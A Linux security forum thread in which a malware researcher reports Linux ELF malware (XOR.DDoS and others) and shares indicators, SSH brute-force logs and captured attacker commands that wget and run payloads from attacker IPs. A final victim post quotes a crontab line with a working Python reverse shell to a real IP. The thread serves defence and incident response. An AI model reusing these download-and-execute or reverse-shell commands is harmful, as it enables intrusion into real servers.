LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 07-01-2015, 10:45 AM   #1
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Rep: Reputation: Disabled
Exclamation If you infected by any of these recent ELF malware cases please contact us?


This is not a spam post, a serious question. We found these five Linux malware is active in infection in the past 2 weeks.

ChinaZ http://blog.malwaremustdie.org/2015/...-reloaded.html

Xor.DDoS http://blog.malwaremustdie.org/2015/...ection_23.html

DES.Downloader http://blog.malwaremustdie.org/2015/...5-new-elf.html

.IptabLes|x http://blog.malwaremustdie.org/2015/...tables-on.html

Mayhem http://www.kernelmode.info/forum/vie...tart=10#p26116

I am sure fellow server's sysadmins know a bit about these malware, if you happen to have infection incident, please comment to the above posts by sharing the infection details with us to handle in IR basis?

Sample can be uploaded in mediadire. You can also reach our team in @malwaremustdie (twitter)

Thank you very much

unixfreaxjp
 
Old 07-03-2015, 04:45 AM   #2
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 6,785
Blog Entries: 3

Rep: Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629
could you please explain a little more what you are refering to?
i don't want to click any random blogpost.
 
Old 07-03-2015, 06:29 PM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,361
Blog Entries: 55

Rep: Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547Reputation: 3547
Quote:
Originally Posted by ondoho View Post
i don't want to click any random blogpost.
These aren't "random web log posts" and if you have any interest in practical security these are worth reading.
 
1 members found this post helpful.
Old 07-03-2015, 08:25 PM   #4
jefro
Moderator
 
Registered: Mar 2008
Posts: 17,101

Rep: Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552Reputation: 2552
I'd have been too skerd to click on them too. Hard to get search results from my known web pages on the topic.

Last edited by jefro; 07-03-2015 at 08:27 PM.
 
Old 07-04-2015, 09:25 AM   #5
Habitual
LQ 5k Club
 
Registered: Jan 2011
Location: Nowhere near you, thank God.
Distribution: OSX Sierra
Posts: 8,576
Blog Entries: 15

Rep: Reputation: Disabled
I read MMD on a regular occasion and I have nothing but Respect for it.
 
Old 07-04-2015, 10:49 AM   #6
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Original Poster
Rep: Reputation: Disabled
I've been working in NIX OS for 21 years now. I started MMD to fight malware of all kind, but I did not see ELF malware was handled as fairly the same as the windows ones, in generally speaking.
I know how it feel to be sysadmin since I've been one of you in the field, and I know how bad an ELF malware can ruin our week days or week ends too. I know how tight the budget is, and I also know how costly the protection for server side if we consider to buy one..yet the information are so limited.

So I dedicated the most of time on ELF recently until the overall mitigation scheme works better.

The links I posted up there are recent cases of report, an analysis, the attack source recently are mostly China, except Linux/Mayhem is Ukraine basis.

I saw the infection source or malware web panel and surprised to the huge numbers of downloads, specially the ones who rides on shellshock infection scheme < this vulnerability really kicks. Also the Elasticsearch exploit and of course the weak ssh force entries.

So I just think maybe there are more admins hit, this is why I asked. You can click on every link I posted safely, I mean no harm. If you can comment with your cases it will be so wonderful.
We NEED more ways to mitigate the infection like setting some directories under specific permission, harden the SE Linux for some points, mdsumchecks regularly for new changes in files, and so on.

Come on, friends, can not fight these alone, let's fight these bad stuff together.

MalwareMustDie

Last edited by malwaremustdie; 07-04-2015 at 10:51 AM.
 
1 members found this post helpful.
Old 07-04-2015, 11:24 AM   #7
Daniel_sal
LQ Newbie
 
Registered: Jul 2015
Posts: 2

Rep: Reputation: Disabled
Come on guys be smart, the people of malwaremustdie are great , they only want a must secure linux , and stop china malware , i always read his blog. Im a sysadmin at mexico , we have some apps living at racksapce cloud , o. January we notice some strange binary an ips conections to china, finally we discover that somebody infect us with an elf using a struts vulnerability on our jboss app. This is the screenshot of virustotal analisys: https://twitter.com/daniel_sal/statu...450181632?s=09

RHEL 6.5

Hope help.
 
Old 07-04-2015, 11:42 AM   #8
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Original Poster
Rep: Reputation: Disabled
There is a good repository for Linux sysadmin to identify an ELF malware.
It is a perfectly safe site, KernelMode is a community of malware researcher. I am a contributor for the repository too, together with the well-known malware researchers.

You can browse to these ELF topics shown in the link, freely, and read the information to what malware hit you, and some posts have good mitigation hints too, but you will need to subscribe for getting the samples.

Link: http://www.kernelmode.info/forum/vie...hp?f=16&t=3471
 
Old 07-08-2015, 04:53 AM   #9
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 6,785
Blog Entries: 3

Rep: Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629Reputation: 1629
thanks to op & everyone for adding more info on this.

i think it's good forum netiquette to post more than just links to other webpages.
i hadn't come across malwaremustdie before.
i have now.
 
Old 08-22-2015, 11:21 AM   #10
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Original Poster
Rep: Reputation: Disabled
There is a new type of ELF malware, the backdoor DDoS type that is merging the function of Linux/Elknot (ref: http://www.kernelmode.info/forum/vie...&t=3099#p23858) and Linux/BillGates (ref: http://www.kernelmode.info/forum/vie...hp?f=16&t=3429).

The source of the threat is this AS40676 in Psychz Networks, but it seems like the actor are from People Rep of China.

This malware will drop the intial config in the current directory where it is executed:
readlink("/proc/[PID/exe", "/[PATH]/MALWARE", 1024)
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR)
unlink("/[PATH]/MALWARENAME\\xmit.ini")
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR|O_CREAT|O_TRUNC, 0666)
write(3, "0\r\n192.168.x.xx:192.168.x.xx\r\n10000:60000\r\n\r\n0\r\n0:0:0\r\n", 55)
close(3)

Which contains the grep local ethernet with the range of port to be used for the outbound attack:
00000000 30 0d 0a 31 39 32 2e 31 36 38 2e 37 2e 32 31 3a |0..192.168.x.x:|
00000010 31 39 32 2e 31 36 38 2e 37 2e 32 31 0d 0a 31 30 |192.168.x.xx..10|
00000020 30 30 30 3a 36 30 30 30 30 0d 0a 0d 0a 30 0d 0a |000:60000....0..|
00000030 30 3a 30 3a 30 0d 0a |0:0:0..|

I reversed this malware to find that the code is a bit "raw" and unfinished in some parts, but the main TCP flood and backdoor function looks works. Different compare to the old fashioned previous version that exhaust the system resource this malware runs and only takes about 30 of my CPU usage.

The way to mitigate is to secure the usage of libnss and never open SSH login of root or anyone with the suid 0 or don't run FTP and Web service, or it's components (webapps) that can be gained-privilege to the root. That way the /tmp and current directory of the infection will be the only workplace for such malware to operate and easier to clean and dissect it.

I am sorry to post more link, but if you want to see a boring details is in here: http://blog.malwaremustdie.org/2015/...w-malware.html
 
1 members found this post helpful.
Old 08-22-2015, 01:01 PM   #11
rokytnji
LQ 5k Club
 
Registered: Mar 2008
Location: Waaaaay out West Texas
Distribution: AntiX 17 , ChromeOS
Posts: 5,203
Blog Entries: 20

Rep: Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477Reputation: 2477
Subscribed to thread. MMD Site bookmarked. Being a slow study. It takes me awhile to soak things in.

Last edited by rokytnji; 08-22-2015 at 01:03 PM.
 
Old 09-15-2015, 06:33 AM   #12
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Original Poster
Rep: Reputation: Disabled
New series of Linux/XOR.DDOS attack are on our Linux servers, dear admin friends.

It was started from ssh brute attacks from:
Code:
43.229.52.79
43.229.53.28
43.229.53.49
43.229.53.63
43.229.53.88
43.255.188.139
43.255.189.16
Be cautious to brute login like below:
Code:
2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
(...)
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]
This will lead to the malware attempt to infect as per below real log:
Code:
2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
 
2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
 
2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
 
2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
 
2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3
If you want to study the malware you can seek in VirusTotal I uploaded them some, with hashes:
Code:
 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
 a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
The malware will connect via HTTP to aa.hostasa.org and perform command and control back connect to several IP as per called by their hostnames summarized/recorded below:
Code:
aa.hostasa.org  23.234.60.143  // http downloads h00p://aa.hostasa.org/leg.rar 
(is a Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
ns1.hostasa.org 107.160.40.9      // cnc
ns2.hostasa.org 103.240.140.152   // cnc
ns3.hostasa.org 103.240.141.54    // cnc
ns4.hostasa.org 192.126.126.64    // cnc
 
;; AUTHORITY SECTION:
hostasa.org.            3600    IN      NS      ns1cnb.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns4lny.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns3cna.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns2dky.domain-resolution.net.
Some recent PoC of the backdoor/back connection to those CNCs:
Code:
[pid  6990] sendto(3, "\326,\1\0\0\1\0\0\0\0\0\0\3ns4\7hostasa\3org\0\0\1\0"..., 33, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>
[pid  6991] sendto(4, "G\r\1\0\0\1\0\0\0\0\0\0\2aa\7hostasa\3org\0\0\1\0\1", 32, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>

ghrirsbfv  IPv4  324559  TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
ghrirsbfv  IPv4  331887  TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)


ghrirsbfv  IPv4  324560  TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)

2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
E..6.@.@....nJ...<..l.Ps...J......tk.........#cU

GET /leg.rar HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: aa.hostasa.org
Connection: Keep-Alive
[...]

2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476: 
Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2 820891645 ecr 34190894], length 1402
E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c..   ..

HTTP/1.1 200 OK
Date: Tue, 15 Sep 2015 05:54:14 GMT
Server: Apache
Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
ETag: "2475-5099c15a16480"
Accept-Ranges: bytes
Content-Length: 9333
Keep-Alive: timeout=5, max=2048
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

/&.{L9R$/8PE    .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
[...]
GeoLocation and routing info for those abused nodes used as CNC by malware crooks:
Code:
// ------------------------
// Infector & CNC IP routes:
// ------------------------

43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
43.255.189.16|| |  |  | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International

23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC

// ------------------------
// Infector & CNC GeoIP 
// ------------------------

43.229.52.79, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.28, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.49, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.63, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.88, , ,   Hong Kong, 22.25, 114.1667, AS
43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
43.255.189.16, , ,  Hong Kong, 22.25, 114.1667, AS

23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642
Noted that attackers are putting payload malware in only this IP:
Code:
43.229.53.90
Compared to the previous case of the same actor (threat source) I found that they shifted the CNC IP into:
Code:
192.126.126.64 & 
107.160.40.9
Reference of this threat:
https://pastebin.com/uT6EhZq0

Reference of this case/actor:
http://blog.malwaremustdie.org/2015/...ection_23.html

Reference of the same malware cases:
http://blog.malwaremustdie.org/2015/...hellshock.html
http://blog.malwaremustdie.org/2014/...new-china.html

Cross checking domain registration is leading to the contact ID below:
Code:
蔡厚泉 (Cai Hou Sien/Quan) / 2511916764@qq.com
Attached Thumbnails
Click image for larger version

Name:	001.jpg
Views:	78
Size:	22.5 KB
ID:	19584   Click image for larger version

Name:	002.png
Views:	98
Size:	64.5 KB
ID:	19585  

Last edited by malwaremustdie; 09-15-2015 at 09:46 AM. Reason: additional (image)
 
3 members found this post helpful.
Old 09-17-2015, 03:52 PM   #13
malwaremustdie
LQ Newbie
 
Registered: Jun 2014
Location: /dev/random
Distribution: minix3
Posts: 8

Original Poster
Rep: Reputation: Disabled
I wrote a new ELF malicious activity, for the threat aimed Linux and it is having a polymorphic method during infection.

This is a bit technical but, practically all of the analysis I just wrote was on the bash shell, I jumped to browse it after about to post it. I think is a thorough explanation for combining: reverse engineering, linux kernel debugging and forensics (mostly memory data from /proc) for this simple analysis.

Why I announce it in here too, is because the most sample of this threat (XOR.DDoS) that went to the signature are from the pre-infection and not post-infection, so if you conduct the scanning AFTER you get infected..there is a possibility that you got no detection since the malware self-copied into other size and hash.

Please read, I hope it makes out POSIX based OS saver from these attackers.

http://blog.malwaremustdie.org/2015/...ic-in-elf.html
 
1 members found this post helpful.
Old 12-05-2016, 01:37 AM   #14
MasterCATZ
LQ Newbie
 
Registered: Dec 2016
Posts: 1

Rep: Reputation: Disabled
my server just got hit today


unsure how they gained access the firewall was setup to drop all connections below port 10 000
that are not in my Ip range ...

this was in the crontab

*/1 * * * * root /usr/local/rtm/bin/rtm 35 > /dev/null 2> /dev/null
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.131.83.13",2 810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
  


Reply

Tags
linux +, malware


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Malware Attack Infected 25,000 Linux/UNIX Servers touch21st Linux - Security 1 03-21-2014 02:13 AM
LXer: Nearly 33 million Android devices infected by malware in 2012 LXer Syndicated Linux News 0 04-16-2013 05:20 PM
LXer: BT Claims Almost Every Android Device Is Malware Infected LXer Syndicated Linux News 0 07-29-2012 05:41 PM
iframe worm or malware infected my php pages ddaas Linux - Security 4 05-22-2009 01:52 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 05:19 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration